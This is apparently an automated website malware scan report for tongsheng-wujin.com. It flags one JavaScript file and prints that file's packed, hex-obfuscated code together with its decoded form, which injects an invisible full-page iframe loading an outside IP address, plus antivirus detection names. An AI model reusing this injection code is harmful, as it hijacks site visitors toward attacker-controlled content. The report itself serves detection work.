New scan:

Malware Scanner report for tongsheng-wujin.com

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://tongsheng-wujin.com/
200 OK
Content-Length: 20645
Content-Type: text/html
clean
http://tongsheng-wujin.com/xsj4.js
200 OK
Content-Length: 1043
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('z r$=[\'\\s\\4\\m\\3\\9\\d\\5\\7\\m\\3\\9\\d\\5\\w\\e\\3\\f\\5\\3\\6\\1\\a\\1\\7\\d\\9\\3\\b\\4\\c\\8\\5\\4\\b\\8\\2\\6\\1\\a\\1\\7\\d\\9\\3\\b\\4\\c\\i\\4\\f\\2\\8\\
... 48 bytes are skipped ...
c\\e\\1\\7\\8\\5\\4\\b\\8\\2\\6\\1\\u\\o\\o\\o\\h\\v\\1\\7\\i\\4\\f\\2\\8\\6\\1\\j\\a\\a\\x\\1\\7\\q\\3\\n\\6\\1\\8\\2\\2\\h\\y\\g\\g\\u\\a\\k\\j\\j\\C\\k\\D\\k\\t\\t\\g\\1\\7\\2\\9\\3\\b\\5\\2\\6\\1\\E\\2\\e\\h\\1\\p\\s\\g\\4\\m\\3\\9\\d\\5\\p\'];A["\\f\\e\\n\\B\\d\\5\\c\\2"]["\\i\\3\\4\\2\\5\\l\\c"](r$[0]);',41,41,'|x22|x74|x72|x69|x65|x3d|x20|x68|x61|x30|x67|x6e|x6d|x6f|x64|x2f|x70|x77|x31|x2e|x6c|x66|x63|x38|x3e|x73|_|x3c|x36|x35|x78|x62|x25|x3a|var|window|x75|x37|x39|x5f'.split('|'),0,{}))

Decoded script:


var _$=['\x3c\x69\x66\x72\x61\x6d\x65\x20\x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x22\x30\x22\x20\x6d\x61\x72\x67\x69\x6e\x68\x65\x69\x67\x68\x74\x3d\x22\x30\x22\x20\x6d\x61\x72\x67\x69\x6e\x77\x69\x64\x74\x68\x3d\x22\x30\x22\x20\x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\x22\x6e\x6f\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x35\x38\x38\x38\x70\x78\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x30\x30\x25\x22\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x35\x30\x2e\x31\x31\x37\x2e\x39\x
... 570 bytes are skipped ...
x69\x64\x74\x68\x3d\x22\x31\x30\x30\x25\x22\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x35\x30\x2e\x31\x31\x37\x2e\x39\x2e\x36\x36\x2f\x22\x20\x74\x61\x72\x67\x65\x74\x3d\x22\x5f\x74\x6f\x70\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e'];window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]);
<iframe frameborder="0" marginheight="0" marginwidth="0" scrolling="no" height="5888px" width="100%" src="http://50.117.9.66/" target="_top"></iframe>

Antivirus reports:

Avast
JS:Agent-CBY [Trj]
Fortinet
JS/WinDocW.A!tr
Norman
Script.BD

http://tongsheng-wujin.com/dfsj3.js
200 OK
Content-Length: 122
Content-Type: application/javascript
clean
http://tongsheng-wujin.com/wangluoduboyouxipingtai/
200 OK
Content-Length: 12886
Content-Type: text/html
clean
http://tongsheng-wujin.com/wangluoduboyouxiwangzhan/
200 OK
Content-Length: 13508
Content-Type: text/html
clean
http://tongsheng-wujin.com/wangluoduboyouxigongsi/
200 OK
Content-Length: 13973
Content-Type: text/html
clean
http://tongsheng-wujin.com/zhenrenwangluodubo/
200 OK
Content-Length: 15139
Content-Type: text/html
clean
http://tongsheng-wujin.com/zhenrenwangluodubo/769.html
200 OK
Content-Length: 38248
Content-Type: text/html
clean
http://tongsheng-wujin.com/zhenrenwangluodubo/768.html
200 OK
Content-Length: 21470
Content-Type: text/html
clean
http://tongsheng-wujin.com/zhenrenwangluodubo/767.html
200 OK
Content-Length: 14405
Content-Type: text/html
clean
http://tongsheng-wujin.com/zhenrenwangluodubo/766.html
200 OK
Content-Length: 15596
Content-Type: text/html
clean
http://tongsheng-wujin.com/zhenrenwangluodubo/765.html
200 OK
Content-Length: 15797
Content-Type: text/html
clean
http://tongsheng-wujin.com/zhenrenwangluodubo/764.html
200 OK
Content-Length: 22598
Content-Type: text/html
clean
http://tongsheng-wujin.com/zhenrenwangluodubo/757.html
200 OK
Content-Length: 16646
Content-Type: text/html
clean
http://tongsheng-wujin.com/zhenrenwangluodubo/501.html
200 OK
Content-Length: 16712
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: tongsheng-wujin.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 10:28:29 GMT
Accept-Ranges: bytes
ETag: "542cfcf7-50a5"
Server: nginx
Vary: Accept-Encoding
Content-Length: 20645
Content-Type: text/html
Last-Modified: Thu, 02 Oct 2014 07:21:27 GMT

...20645 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tongsheng-wujin.com
Referer: http://www.google.com/search?q=tongsheng-wujin.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=tongsheng-wujin.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tongsheng-wujin.com/

Result: tongsheng-wujin.com is not infected or malware details are not published yet.